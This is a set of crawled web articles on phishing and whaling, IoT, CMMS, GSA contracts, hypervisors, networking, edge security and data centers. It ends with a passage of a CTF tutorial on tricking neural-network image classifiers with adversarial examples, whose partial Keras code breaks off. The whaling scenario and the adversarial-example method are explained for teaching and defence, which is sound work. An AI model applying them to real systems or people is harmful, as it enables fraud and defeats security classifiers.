legitimate. A common technique used by phishers is to pull names, email addresses and phone numbers from a company website. This helps the scammers understand the hierarchy of the organization and aids them in planning who they will impersonate. To better understand how whaling differs from other forms of email attacks, let's take a brief look at the different types of phishing attacks. Email phishing is the most common type of email scam, and is often what people refer to when they talk about phishing in general. It’s estimated that nearly half of all emails sent contain some sort of phishing attack. These emails can vary in messaging but often pretend to be a legitimate company, or person an organization does business with often. 
Fake password resets, phony invoices and bogus shipping updates are among the most common types of email phishing attacks. Spear phishing focuses its attack on a single organization and uses research gathered online to impersonate companies or individuals that a company frequently does business with. Attackers can impersonate either a trusted third party, or someone that works inside of the target company. These attacks will target single departments or individuals to try and compromise the company. Everything from the subject line, to the name of the sender can all be tailored and customized to be as familiar to the target as possible. While email phishing may cast a wide net to try and catch many fish, spear phishing uses a single spear to target one very lucrative fish. Smishing is an attack that uses text messaging (SMS) in order to deliver a harmful message. These can be either targeted attacks or widespread phishing campaigns that attempt to trick users into clicking fake links and entering their information. The most common forms of smishing are fake shipping updates, customer rewards, and, especially recently, messages impersonating the IRS regarding stimulus check updates. Vishing is when an attacker uses voice communications to steal information. These usually take the form of a voicemail message claiming that the recipient owes money, has been hacked, or is in legal trouble with the IRS. The goal of these scams is the same of every scam, to obtain information or funds illegally. Vishing can also take place if a user calls a fake number. Malicious websites create fake pop ups claiming a computer has been hacked, and scaring the user into calling the ‘tech support’ number for assistance. In reality the computer is not hacked, but after a phone call the fake tech support scammer will establish a remote connection and either infect the machine, or pretend to fix the problem in exchange for a fee. Example of Whaling in Action What does a Whaling attack look like? Let’s run a mock scenario. After weeks of research, attackers have gathered information on ABC Company and are ready to begin their Whaling campaign. They know the names and email addresses of the C-level staff members and are going to attempt to trick one of them into opening an attachment that will silently install spyware in the background. This spyware will steal company secrets, financial information, and even assets that will aid in future whaling campaigns. Attackers register a fake domain that looks exactly like ABC Company. Instead of the real abccompany.com, they create abcconpany.com — a misspelling that is tough to spot. They use that email address to impersonate the CEO, and send an email to the accountant. The message states that an invoice is overdue and urgently needs to be paid. The attachment looks like a real PDF invoice, but is actually a payload that will install malware once opened. To make matters worse the account numbers in the fake invoice are to the attacker's company, meaning not only does the account install malware, but they also send money to the attacker. Consequences of Whaling Whaling can have a devastating impact on organizations of all sizes, as the attack focuses on stealing the most sensitive forms or data and financial information. Unlike traditional phishing, highly valuable information such as tax returns and bank account numbers are targeted. This can lead to fraudulent wire transfers, stolen identities, and even more coordinated follow-up attacks. How Can I Defend Against Whaling? 
Preventing phishing, or more specifically Whaling, is never as simple as installing a program. It takes a dedicated phishing response plan in order to remain protective and minimize the impacts of phishing attacks. Here are a few steps you can take to prevent whaling: - Implement email rules that tag external emails as “outside of the organization.” This helps users know right away when an email is coming from outside the company. This capability is often part of a larger data loss prevention (DLP) solution, such as Clearswift. - Create policies and procedures for sensitive tasks such as wire transfers or sending financial information. Having someone approve these requests or use a secondary channel helps catch phishing attempts in action before it’s too late. - Implement phishing training across your organization. Staff training uses a combination of fake phishing emails along with customized training to measure how knowledgeable staff members are in email security. - Invest in professional defense. There are a lot of moving parts when it comes to defending against whaling attacks. Companies can partner with organizations like Agari to build a phishing defense plan that prevents these attacks from ever making it to the inbox. How Do I Report a Phishing Attack? If you’ve fallen victim to an email-based scam, or have been sent a phishing email, there are a few simple steps you can use to report it. If you’ve received a phishing email, you can forward it directly to the FTC Anti-Phishing Working Group at [email protected]. If the message was a text message you can forward it to SPAM (7726). You can then report the phishing attack by visiting http://ftc.gov/complaint. The Agari Advantage Agari offers a turnkey solution to prevent whaling attacks through automatic phishing response, remediation, and containment. The system utilizes both signature-based security as well as behavioral analysis to stop malicious files and bad actors at the same time. If you’re looking to learn how to keep your business safe from whaling attacks, learn more about Agari Phishing Response.
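One of the technical checks implied by the lookalike-domain example above can be sketched in a few lines. This is an illustrative toy, not Agari's detection logic; the trusted-domain list and distance threshold are invented.

```python
# Illustrative sketch of a lookalike-domain check of the kind a mail gateway
# might apply. The trusted domains and threshold are invented for illustration.
def edit_distance(a, b):
    """Classic Levenshtein distance between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        curr = [i]
        for j, cb in enumerate(b, 1):
            curr.append(min(prev[j] + 1,                 # deletion
                            curr[j - 1] + 1,             # insertion
                            prev[j - 1] + (ca != cb)))   # substitution
        prev = curr
    return prev[-1]

TRUSTED_DOMAINS = {"abccompany.com"}

def flag_lookalike(sender_domain, max_distance=2):
    """Flag domains that are close to, but not exactly, a trusted domain."""
    for trusted in TRUSTED_DOMAINS:
        distance = edit_distance(sender_domain.lower(), trusted)
        if 0 < distance <= max_distance:
            return f"suspicious: '{sender_domain}' resembles '{trusted}'"
    return "ok"

print(flag_lookalike("abcconpany.com"))  # suspicious: one letter swapped
print(flag_lookalike("abccompany.com"))  # ok: exact match with trusted domain
```

A check like this catches the "abcconpany.com" trick from the mock scenario, but it is only one layer; the policy and training measures listed above are still needed for spoofed display names and compromised legitimate accounts.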
<urn:uuid:a157ef7c-b964-43fe-b306-5a8a95cc758c>
CC-MAIN-2022-40
https://www.agari.com/blog/whaling-phishing-email-fraud
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00069.warc.gz
en
0.937654
1,893
3.109375
3
Published 2 Years Ago on Tuesday, Jun 23 2020 By Inside Telecom Staff
The Internet of Things (IoT) refers to billions of devices that are connected to the internet. These devices have the ability to transfer data without human-to-human or human-to-computer interactions. According to Bain & Company, the combined markets of the Internet of Things will grow to about $520 billion in 2021. This technology has infiltrated our daily lives and is now providing advanced public safety solutions. Machine-to-machine communications are reshaping public safety. Considered a game-changer for public safety, this technology will help first responders make decisions before arriving on the scene. By using these connected devices, they can identify mission challenges and resources. In the case of a fire in a building, the accident response team could use the data collected from IoT-connected devices such as vehicles, surrounding infrastructure, and victims. On the other hand, IoT sensors could notify citizens on their phones about an emergency so they can leave the location.
In July 2019, the European Telecommunications Standards Institute (ETSI) published a technical report entitled "Study of use cases and communications involving IoT devices in the provision of emergency situations," which highlighted the importance of drones as special IoT devices. "Drones can be used by emergency services or disaster management agencies to monitor large fields and forests during dry spells to reduce the risk of wildfire," states the report. The ETSI report also mentions the advantages of IoT use for environmental catastrophes. IoT devices provide an automated emergency response based on the received warning message. For example, in case of an earthquake, IoT devices can stop or deactivate an elevator. In addition, IoT devices can prevent emergencies before they arise. According to the report, when a gas pipeline reaches high pressure in a location, the IoT device informs a remote-control system to regulate the situation and prevent an explosion.
In June 2019, the National Public Safety Telecommunications Council (NPSTC) published a report entitled "Public Safety Internet of Things (IoT)". The report refers to the usage of IoT for incident detection, such as school shootings. For example, a school in the US has implemented a new sensor and analytics technology following a series of deadly school shootings across the country. A security camera installed in a passageway can detect the presence of a handgun. After detecting a gunshot, the system sends an alert message to the school's monitoring center, which takes action. When such an emergency is detected, the alarm pull stations at the school are automatically disabled to prevent students from evacuating into open areas. If the gunman runs to another building, an update on his location is sent to the system. The Internet of Things can also locate people in danger, including hikers. By wearing IoT-connected devices, hikers can take comfort in knowing that emergency officials can rapidly detect their locations.
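To sketch how the kind of sensor-to-monitoring-center alerting described above is typically wired together, here is a minimal Python example using the paho-mqtt client (a common, but here assumed, choice). The broker address, topic, and payload are placeholders for illustration and are not taken from the ETSI or NPSTC reports.

import json
import paho.mqtt.client as mqtt

BROKER_HOST = "monitoring.example.org"     # placeholder monitoring-center broker
ALERT_TOPIC = "public-safety/alerts"       # placeholder topic name

def publish_alert(sensor_id, event, location):
    client = mqtt.Client()                 # paho-mqtt 1.x style constructor
    client.connect(BROKER_HOST, 1883, keepalive=60)
    payload = json.dumps({"sensor": sensor_id, "event": event, "location": location})
    client.publish(ALERT_TOPIC, payload, qos=1)   # qos=1: at-least-once delivery
    client.disconnect()

# Example: a gunshot-detection sensor raising an alert
publish_alert("building-3-cam-7", "gunshot_detected", {"lat": 40.7128, "lon": -74.0060})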
<urn:uuid:00fac4de-8f82-4ac3-a152-37275eb96963>
CC-MAIN-2022-40
https://insidetelecom.com/iot-an-essential-tool-for-enhancing-public-safety/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00069.warc.gz
en
0.944595
718
2.859375
3
The factory floor, once viewed as a retro throwback to an earlier industrial-based economy, is getting a big makeover, and in many ways is now on the cutting edge of technology. It's one of the Internet of Things' (IoT) major showplaces. And it's moving beyond that, with the increasing popularity of Computerized Maintenance Management Systems (CMMS). The integration of CMMS and IoT is clearly the future of manufacturing, and mobile is as well.
First, a brief primer on CMMS. These systems use real-time performance metrics, data acquisition, and production analysis to make sure a factory runs as efficiently as possible by scheduling and tracking maintenance and keeping a historical record of all maintenance done. By doing that, they can solve problems before they even start. They're a big leap over the traditional paper-based ways of scheduling and tracking maintenance.
IoT is playing a larger role in CMMS. IoT devices can be deployed everywhere in a factory, not just on manufacturing equipment, but also to do things such as measure temperature, humidity, and other environmental factors. They can measure an astonishing number of variables, down to the vibration levels of equipment. Massive amounts of IoT data are fed into a CMMS, and analysis is done to make sure everything is running the way it should. Predictive analytics can be used to peer into the future and see potential issues. The CMMS can then be used to resolve them.
CMMS can dramatically reduce maintenance costs, of course. The marine division of Caterpillar, for example, uses shipboard IoT sensors to gather data about generators, engines, GPS, air conditioning systems, and fuel meters. It pumps all that data into a CMMS and looks for ways to improve the functioning of the ship. For example, Caterpillar did an analysis of generators that power its refrigerated containers and found that if it ran more generators at lower power, it would save money compared to using fewer generators at higher power. The result: $650,000 in savings a year. The combination of a CMMS and IoT can do much more than that, though. By making sure the factory runs smoothly, they can increase its output and reduce downtime. That can add many millions of dollars to a company's bottom line.
Mobile apps are a key component of IoT-CMMS integration. A mobile CMMS can send alerts to maintenance workers' mobile devices to tell them when a system needs maintenance. Mobile apps can function as dashboards to help run the factory. Workers can carry around mobile apps that gather sensor data at the source. There are plenty more applications as well.
At Alpha Software, we're big believers in both IoT and CMMS, and especially in their integration. Alpha Anywhere is already being used on the factory floor to build offline field service apps and inspection apps, which are integral components of a CMMS.
- Build mobile manufacturing apps: Learn about the Alpha TransForm solution for quality management, including quality control and quality assurance.
- A Recent Survey Shows Why You Need a Mobile CMMS
- Read How IOT Coupled with an EAM CMMS Solution Can Help Managers and Engineers Execute Tasks Properly and Efficiently
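As a rough, simplified sketch of the kind of analysis a CMMS might run on incoming IoT sensor data, the following Python snippet flags a machine for maintenance when its recent average vibration reading drifts above a threshold. The readings and the threshold are invented for illustration; real systems would use vendor- or standards-based limits.

from statistics import mean

# Assumed vibration readings (mm/s) streamed from a sensor on one machine
readings = [2.1, 2.3, 2.2, 2.8, 3.4, 3.9, 4.2]

VIBRATION_LIMIT = 3.5   # illustrative threshold, not a real engineering limit
WINDOW = 3              # average the last few samples to smooth out noise

def needs_maintenance(samples):
    recent = samples[-WINDOW:]
    return mean(recent) > VIBRATION_LIMIT

if needs_maintenance(readings):
    # A real CMMS would open a work order here instead of printing
    print("Create work order: vibration trending above limit")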
<urn:uuid:28b6b285-830f-4d83-bd2c-2ec5720abcda>
CC-MAIN-2022-40
https://www.alphasoftware.com/blog/iot-cmms-integration
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00069.warc.gz
en
0.935535
671
2.65625
3
This article will provide a comprehensive GSA guide: here are GSA Contracts for Dummies. President Harry S. Truman founded the GSA in 1949 to streamline federal procurement and administrative operations. The GSA has evolved significantly since the late 1940s and is currently America's sole supplier for federal products and services. The General Services Administration (GSA) manages federal procurement, relieving other federal agencies of administrative duties. GSA awards long-term, governmentwide contracts to businesses hoping to make it big in the government space, and federal, state, and municipal governments buy from those contracts at pre-negotiated prices.
What is a GSA Schedule?
GSA provides products and services that help federal agencies serve the public. The GSA Schedules initiative reduces lead times and increases vendor transparency. The Federal Acquisition Service (FAS) provides comprehensive products and services across government with taxpayer dollars. For a GSA Multiple Award Schedule (MAS) contract, a vendor must submit a proposal that meets the requirements of the GSA. Moreover, companies can apply for GSA Schedules at any time, allowing them to enter the federal market whenever they want. Click here to calculate ROI! One major distinction between selling commercially and selling through a GSA contract is the agreed-upon terms and conditions negotiated during the GSA Schedule acquisition procedure. Having established terms and conditions simplifies the purchase process for federal agencies. By holding a GSA contract, you assure federal organizations that your rates and business have been examined thoroughly, allowing them to purchase from you.
The Benefits of GSA Contracts
As part of this GSA Contracts for Dummies guide, here are some of the most notable benefits for government agencies and contractors. Government agencies enjoy a variety of benefits when they utilize the GSA Schedules Program, including:
Reduced Administrative Costs
Government customers receive the greatest value and assurance that the vendor has been verified and has met the conditions for competitive bidding on its products and services. Additionally, agencies can purchase new goods and services more efficiently than under conventional contracts, resulting in shorter lead times. Government customers benefit from competitive market-based pricing, which takes advantage of the federal government's purchasing power. They have the potential to negotiate further discounts at the order level.
Enjoy Flexibility of Choice
Government customers can modify terms and conditions at the order level through GSA Schedules and have access to a large number of contractors who provide specialized solutions for services and goods through the program.
Cut Time Requirements
Government customers benefit from rapid and easy access to the appropriate industry partners, enabling them to make the best use of their precious time. Additionally, contracts get awarded in days rather than months. Customers in the government sector benefit from electronic access to competent contractors and aid in achieving social goals. Additionally, when they utilize GSA e-Tools, they can incorporate business intelligence into their purchasing behavior.
Contractors or Vendors
Additionally, the GSA Schedules Program provides numerous incentives to small firms and vendors:
More Business Opportunities
Because the GSA is a major purchaser of products and services from small businesses, opportunities are increasing. GSA contracts also result in enhanced awareness and reputation for your company.
Provide Equal Opportunities Small firms account for 80% of all GSA Schedule holders. Small disadvantaged businesses, women-owned businesses, HUBZone (Historically Underutilized Business Zone) enterprises, veteran-owned businesses, and service-disabled veteran-owned businesses are among the groups who will benefit from the expansion of opportunities for them. Create Long-Term Business Opportunities Contract terms can be as long as five years, with a maximum of three five-year renewal options available. This option could result in a contract with the government for your products and services for 20 years. Present a Wide Range of Products or Services You can find your product or service among the more than 11 million commercial items available for purchase. Allow Healthy Competition The GSA Schedule has more than 19,000 contract holders listed on it. Even though this figure is considerable, the actual number of competitors in your field of expertise may be significantly lower. How to Get on the Schedule Here is how to get GSA Contracts for dummies: Step 1: Obtain a Copy of the Solicitation Package Download the most current revision of the MAS IT Solicitation. The solicitation package guides industry partners to sell IT products, services, and solutions to federal, state, and local government customers. By replying to this solicitation, you may acquire a MAS IT contract. This stipulation allows your company to benefit and expand. Do not forget to read the solicitation package and its attachments before responding, as it has more instructions. Step 2: Prepare Your Proposal As requested, gather key organizational documents such as financials, catalogs, pricing lists, brochures, and organization charts. If you have any questions while you prepare your offer, feel free to contact the IT Schedule Programs Office for clarification. Step 3: Submit Your Offer The eOffer system allows potential industry partners to make an electronic offer to the most recent request by completing a step-by-step approach. Moreover, eOffer enables an online, paperless contracting environment that meets FAR rules and environmental aims. Industry partners must use the eOffer system to submit offers. For more information, you may visit the Vendor Support Center for help. Step 4: GSA will Review Your Offer Once your offer gets submitted to GSA, it will get reviewed by a contracting officer. The contracting officer will serve as a guide for you during this process. Following the initial evaluation, the contracting officer will negotiate the contract’s terms and conditions, including the contract’s price. The government will give a GSA Schedule contract if all conditions get met, the prices are reasonable, and the offer is in the government’s best interests. Step 5: Keep and Maintain Your Contract Following the contract award, an industry partner will frequently need to change some contract information. The GSA eMod system permits industry partners granted a GSA Schedule contract to submit electronic contract adjustments. No matter how tough or daunting the GSA Schedule acquisition procedure appears to be, completing it will increase your chances of obtaining better opportunities. Offering your products and services to the federal government can be overwhelming. Still, with the right tools and advisors on your team, you can achieve your objective of being awarded a GSA Schedule Contract. Hopefully, you have found this GSA Contracts for Dummies guide to assist your next business endeavor.
<urn:uuid:8994932c-0144-4471-9968-854097116d46>
CC-MAIN-2022-40
https://www.gsascheduleservices.com/blog/gsa-contracts-for-dummies/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00069.warc.gz
en
0.930257
1,363
2.734375
3
Computers can be connected, or networked, to one another through cable or wireless technologies, enabling communications and data and resource sharing. A network can be limited to a single building or spread across the entire globe.
Local Area Network (LAN)
A local area network (LAN) is a group of computers connected to share files and other resources such as printers. All computers or workstations in the system are usually connected to a powerful computer known as the file server. See Figure 1. The file server provides the software and data files to which the workstations commonly need access. A network system is designed to save money and time. Databases are easily shared and files are easily accessed from a single location. Networks are common in businesses and educational settings.
Figure 1. A simple client/server network.
In addition to the network operating system software on the server, network client software is required on each workstation to complete communications between the workstations and the file server, printers, and modems on the LAN. The network operating system software also provides security. A network administrator uses special utility programs to set up user passwords and to limit access to certain resources and files.
Wide Area Network (WAN)
A wide area network (WAN) is simply an expansion of a LAN. LANs are typically set up in a single building and connected by copper or fiber-optic cable. A WAN can have stations many miles apart. A WAN depends on routers, hardware or software devices that determine the best route for the information to take, Figure 2. The router sends signals over telephone lines or via satellite to tie the computers and information together. Through the WAN, users have instant access to all programs and information contained in the network. A network administrator can also manage WAN security.
Figure 2. Routers route data traffic across the entire world. As you can see, there are several routes that can be chosen to send a data packet from ACME, Inc. to ZZZ, Inc. The job of the router is to select the best route. This is determined by the amount of data to be sent, the status of the other networks the router is connected to, and the quickest available route.
The Internet, or World Wide Web (WWW), is such a technology; most of us use it daily. As an electronic technician you will need to use it often for product information, specifications, research, and many other segments of your work. The resources available through the Internet are virtually unlimited. To access the Internet, a user needs only a service provider, a modem for transmission, a Web browser (a program that allows the user to navigate, view, and interact with the Internet), and some basic knowledge of how the system works. Many Internet providers give free access time to allow a user to try the system. Wireless technology has made the Internet and many of its functions completely portable. Business can be conducted from nearly anywhere in the world, and transactions, messages, and many other types of communications can be accomplished from remote locations.
Digital Subscriber Line (DSL) is a high-bandwidth Internet connection that uses a regular phone line. This means any phone line installed recently will support DSL. You must also be within a specific distance of the telephone company office in order for DSL to work properly.
DSL is a point-to-point connection, which means it will provide steady bandwidth and will not fluctuate like other broadband connections. The required components for a DSL connection are shown in Figure 3.
Figure 3. The basic parts necessary to establish a DSL connection.
Some DSL modems use a USB cable and connect to the PC USB port. No network adapter is required if a USB cable is used. Other equipment that may use the same DSL line as the PC includes fax machines and telephones. The use of either of these devices requires a filter to be installed as well. The filter prevents lower-frequency signals to and from the fax machine or telephone from interfering with or corrupting the higher-frequency signals used for the PC Internet connection.
The cable modem is similar to the DSL modem. It allows existing cable television coaxial cable to be used for Internet access. See Figure 4. The cable modem is installed between a coaxial cable splitter and the PC. This configuration allows the cable to supply a television signal to the television while providing Internet access to the PC. The coaxial cable connects to the cable modem from the splitter. More than one PC can utilize the cable Internet connection if a router or gateway is installed. Some cable modems are a combination modem and router or gateway.
Figure 4. Basic cable modem connections.
1. A LAN is a collection of computers connected to a file server for sharing data and software.
2. The Internet is a system using both hard-wired and wireless technology to connect computers all over the world.
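To give a concrete flavor of the client/server communication described above, here is a minimal Python sketch of a workstation-style client talking to a server over TCP on a local network. The address, port, and request format are placeholders, and the sketch assumes some server is already listening at that address; it is illustrative only and not part of the original lesson.

import socket

SERVER_ADDRESS = ("192.168.1.10", 5000)    # placeholder file-server address on the LAN

# Client side: a workstation sending a simple request to the server
with socket.create_connection(SERVER_ADDRESS, timeout=5) as sock:
    sock.sendall(b"LIST /shared/reports\n")            # made-up request format
    reply = sock.recv(4096)                            # read up to 4 KB of the reply
    print(reply.decode("utf-8", errors="replace"))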
<urn:uuid:e70e68df-0b9e-4014-981f-25d9f4ee2945>
CC-MAIN-2022-40
https://electricala2z.com/electronics/lan-wan-internet-explained/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00069.warc.gz
en
0.922556
1,022
3.6875
4
If you still don't know the term hypervisor, do not be fooled: this technology is not as recent as it may seem. It emerged in the 1970s, boosted by innovative technologies of the time from the giant IBM. The solution, created to reduce costs, consisted of consolidating multiple computers from different departments into a single central machine, a mainframe. In this way, the hypervisor created on this mainframe allowed the execution of multiple operating systems and, even if there were flaws in one of them, the others remained stable. At that time, when computers were huge and boiled down to robust mainframes, there was no easy way to download, install, and use software on any machine. Software was developed almost exclusively for the model for which it was designed. Since then, hypervisors and their virtual machines have gained strength and have become essential solutions for technology companies. Continue reading this content to understand a little more about hypervisors!
How does the hypervisor work?
A hypervisor is basically a layer of software located between the hardware and the operating system. Through it, several virtual machines can have access to hardware resources such as CPU, memory, network, storage, and so on. In addition, this feature can ensure greater security for virtual machines through mechanisms such as isolation, tunneling, and partitioning. One of the best-known advantages of a hypervisor is the ability to emulate multiple operating systems on the same machine. In this way, the IT department does not need to allocate resources to the acquisition of several physical units and can divide the processing power of one among several virtualized systems. This allows for high portability and flexibility. This type of solution has regained its strength because of the ease with which it allows the IT department to manage several servers and applications independently, even using the same hardware. For example, you can test an application in isolation, without running the risk of malware affecting other applications and system functionality.
What types of hypervisor exist?
There are two types of hypervisors: bare-metal and hosted. If you have ever used an application that emulated a virtual machine on your desktop, such as Oracle VirtualBox, VMware Workstation, QEMU, Microsoft Virtual PC, Microsoft Virtual Server, or similar, then you have used a hosted hypervisor. This option is commonly intended for use on personal desktops and runs as software on top of an operating system. For example, on a Windows operating system you can run a virtual machine that simulates a Linux operating system with all its functionality. It works inside a window, and it is possible to use native OS applications, such as a web browser, in parallel with the virtualized environment, which is not possible with the bare-metal type. The hosted option can provide high hardware compatibility, which allows the virtualization software to support a wide range of configurations. In turn, the bare-metal option provides a variety of I/O access options, ensuring greater performance. This is possible because the hypervisor layer, in this option, sits just above the hardware layer, operating independently of the operating system, which comes next. The image below shows, in a didactic way, the difference between the two types of hypervisor architecture.
Does your business need a hypervisor?
If you need more computing power but do not want to invest in the purchase of more physical machines, and you wish to take full advantage of your servers, the hypervisor and its virtual machines are essential solutions for your business. In practice, they offer the same results as any other computer, but they do not exist physically, only logically, and they can be used for a variety of purposes, such as running ERP systems, cloud computing services, and simulation tools, among others. In short, a hypervisor can bring numerous benefits such as centralized management, rapid deployment, ease of migration and expansion, the ability to create a test environment, and thus more security and reliability. Now it's up to you, the manager or IT professional, to identify the real needs of your business and evaluate whether deploying a hypervisor is necessary. And if you still have questions, please contact us through the comments or our contact form. Our team is prepared and eager to ensure the safety and success of your business.
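As a small, illustrative example of working with a hypervisor programmatically, the sketch below lists the virtual machines known to a libvirt-managed host (for example, KVM/QEMU on Linux). It assumes the libvirt daemon and the libvirt Python bindings are installed; the connection URI is just the common local default and is not tied to any product named above.

import libvirt  # Python bindings for the libvirt virtualization API

# Connect to the local system hypervisor (QEMU/KVM in this example)
conn = libvirt.open("qemu:///system")
if conn is None:
    raise SystemExit("Failed to connect to the hypervisor")

for domain in conn.listAllDomains():
    state = "running" if domain.isActive() else "stopped"
    print(f"{domain.name():20s} {state}")

conn.close()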
<urn:uuid:e94eb2f2-fbc5-434e-9de6-acb64d6ae5b8>
CC-MAIN-2022-40
https://ostec.blog/en/general/what-are-hypervisors/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00069.warc.gz
en
0.939548
870
3.34375
3
What Is Edge Security? | Buzzwords Edge security is an increasingly important aspect of any corporate network. In the simplest terms, edge security means protecting your most vulnerable devices at the “edge” of your network. As the Internet of Things takes over and becomes an ever-present part of our personal and working lives, the number of endpoints has risen exponentially—and with it the number of attack vectors. Malicious actors have wasted no time directing their efforts towards exploiting IoT devices, which today can be virtually anything—from phones to laptops and TVs to fridges. Edge security as a result is very important to SMBs and enterprises looking to protect their data. Watch this explainer video as we break down edge security and go over everything you need to know about this fast-emerging field of cybersecurity. Find out more below: The Buzzword series features short videos that break down popular topics focused on business and technology. Each video takes a look at a top trend, and why you may want to incorporate it into your organization. View the full series here. More on business cybersecurity What Is Secure Access Service Edge (SASE)? What is Secure Access Service Edge and how can it help protect your business from modern cyberthreats? Find out here. Pandemic Cyberattacks Are Driving Tech Adoption Pandemic cyberattacks have been a major issue in 2020, and businesses are responding with investment, but what tools are they adopting most frequently? Find out here. Why You Need Layered Security The cybersecurity challenges of today continue to show why SMBs can’t rely on simple security. Find out about layered cybersecurity here.
<urn:uuid:d1a7b1d5-c8f9-40c4-b8e1-e9d19cbf516f>
CC-MAIN-2022-40
https://www.impactmybiz.com/videos/what-is-edge-security-buzzwords/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00069.warc.gz
en
0.929521
344
2.65625
3
The Importance of Green Data Centers
Data centers have an ethical responsibility to be change agents and play a critical role in enacting policies that reduce the environmental impact of data storage.
FREMONT, CA: Sustainability takes on a more intense and inventive meaning for the data center business, which is responsible for at least 1 percent of global energy consumption. Data centers, like other businesses, need to develop and promote more sustainable choices and solutions due to the sheer size and scope of their operations. Moreover, if we consider these hubs to be the epicenter of connectivity, data storage, and processing, as well as a range of business-critical applications, it's only natural to assume that data storage and internet usage will continue to rise in the coming years. It could even be claimed that data centers have an ethical responsibility to be change agents and play a critical role in enacting policies that reduce the environmental impact of data storage. Some companies have already pledged to decrease their environmental footprint and invest in more sustainable energy solutions as part of their long-term green plan. Many initiatives are being taken to reduce data center energy usage, but if consumption is to be kept to a minimum, this process will need to be accelerated, especially considering that data usage grew by 47 percent in the first quarter of 2020, during the first COVID-19 lockdown.
Data compression's key benefit is that compressed files take less time to transfer and use less network bandwidth. Less storage capacity is required as file size, data transmission time, and communication bandwidth are reduced, resulting in lower energy usage, higher productivity, and significant cost savings. Immersion cooling, on the other hand, is a more practical approach to tackling energy inefficiency issues. The procedure involves immersing computer components or entire servers in a dielectric liquid that allows for better heat transfer than air. 4D recently adopted this technique, installing a very energy-efficient "pod" at its Gatwick location that utilizes immersion cooling technology. The "pod" employs a biodegradable dielectric fluid with half the density of water and heat exchangers to keep IT equipment cool. Intercoolers and water are utilized to keep the fluid cool, and an internal heat exchanger takes heat from the fluid and redistributes it into chilled water, which is then pumped out and cooled down again in 4D's adiabatic cooling towers, a method similar to that used in the automobile sector.
One option to make data centers more environmentally friendly is to use renewable energy sources. Because electricity is the primary resource for conducting daily operations, the environmental impact of a single data center will be primarily decided by where it gets its electricity. This means that, depending on their resources and location, data centers may be able to design a more ecologically friendly system, such as using wind, solar, or even tidal energy. By embracing sustainability, data centers have a real chance to effect change. Committing to a green agenda is a positive step for any organization, but to be sustainable, business owners must guarantee that energy efficiency is at the forefront of every facet of how a data center is run.
Business owners can manage their data centers smartly and cleanly by finding the most sustainable materials and technology for developing and managing these energy-intensive hubs, ensuring that their impact on the environment is minimized as data consumption continues to grow.
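To make the data-compression point above a little more tangible, here is a small Python sketch that measures how much a payload shrinks with gzip before it is transferred or stored. The sample data is arbitrary and highly repetitive; real-world savings depend entirely on the data being compressed.

import gzip

# Arbitrary, repetitive sample payload (sensor log lines)
payload = ("timestamp,sensor_id,temperature_c\n"
           + "2022-09-25T12:00:00,rack-42,21.5\n" * 10_000).encode("utf-8")

compressed = gzip.compress(payload, compresslevel=6)

ratio = len(compressed) / len(payload)
print(f"original:   {len(payload):,} bytes")
print(f"compressed: {len(compressed):,} bytes")
print(f"compressed size is {ratio:.1%} of the original")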
<urn:uuid:816bb1c5-b109-4127-b711-f0c8630f95fd>
CC-MAIN-2022-40
https://www.cioapplications.com/news/the-importance-of-green-data-centers-nid-8578.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00269.warc.gz
en
0.942048
703
2.828125
3
Fool the Machine: Trick neural network classifiers
Artificial Neural Networks (ANNs) are certainly a wondrous achievement. They solve classification and other learning tasks with great accuracy. However, they are not flawless and might misclassify certain inputs. No problem, some error is expected. But what if you could give a network two inputs that are virtually identical, yet get different outputs? Worse, what if one is correctly classified but the other has been manipulated so that it is classified as anything you want? Could these adversarial examples be the bane of neural networks?
That is what happened with one PicoCTF challenge we came across recently. There is an application whose sole purpose is to accept a user-uploaded image, classify it, and let you know the results. Our task was to take the image of a dog, correctly classified as a Malinois, and manipulate it so that it is classified as a tree frog. However, for your image to be a proper adversarial example, it must be perceptually indistinguishable from the original; in other words, it must still look like the same previously-classified dog to a human.
Figure 1. Challenge description.
The applications are potentially endless. You could:
- fool image recognition systems like physical security cameras, as does this Stealth T-shirt.
- make an autonomous car crash.
- confuse virtual assistants.
- bypass spam filters, etc.
So, how does one go about creating such an adversarial example? Recall from our brief survey of machine learning techniques that training is an iterative process in which you continuously adjust the weight parameters of your black box (the ANN) until the outputs agree with the expected ones or, at least, minimize the cost function, which is a measure of how wrong the prediction is. I will borrow an image that better explains it from an article by Adam Geitgey.
Figure 2. Training a neural network, by Adam Geitgey.
This technique is known as backpropagation. Now, in order to obtain a picture that still looks like the original but will classify as something entirely different, what one could do is add some noise; but not too much noise, so the picture doesn't change, and not just anywhere, but exactly in the right places, so that the classifier reads a different pattern. Some clever folks from Google found out that the best way to do this is by using the gradient of the cost function.
Figure 3. Adding noise to fool the classifier.
This is called the fast gradient sign method. This gradient can be computed using backpropagation, but in reverse. Since the model is already trained and we can't modify it, let's modify the picture little by little and see if it gets us any closer to the target. I will again borrow from @ageitgey, since the analogy is much clearer this way.
Figure 4. Tweaking the image, by @ageitgey.
The pseudo-code that would generate an adversarial example via this method would be as follows. Assume that the model is saved in an .h5 file, as in the challenge. Keras is a popular high-level neural network API for Python. We can load the model, get the input and output layers (first and last), get the cost and gradient functions, and define a convenience function that returns both for a particular input, like this:
Getting cost function and gradients from a neural network.
import numpy as np
from keras.models import load_model
from keras import backend as K

model = load_model('model.h5')

input_layer = model.layers[0].input        # first layer: the image input
output_layer = model.layers[-1].output     # last layer: class probabilities

# Probability the model assigns to the class we want to fake (the target class)
cost_function = output_layer[0, object_type_to_fake]
# K.gradients returns a list; we only need the gradient w.r.t. the input
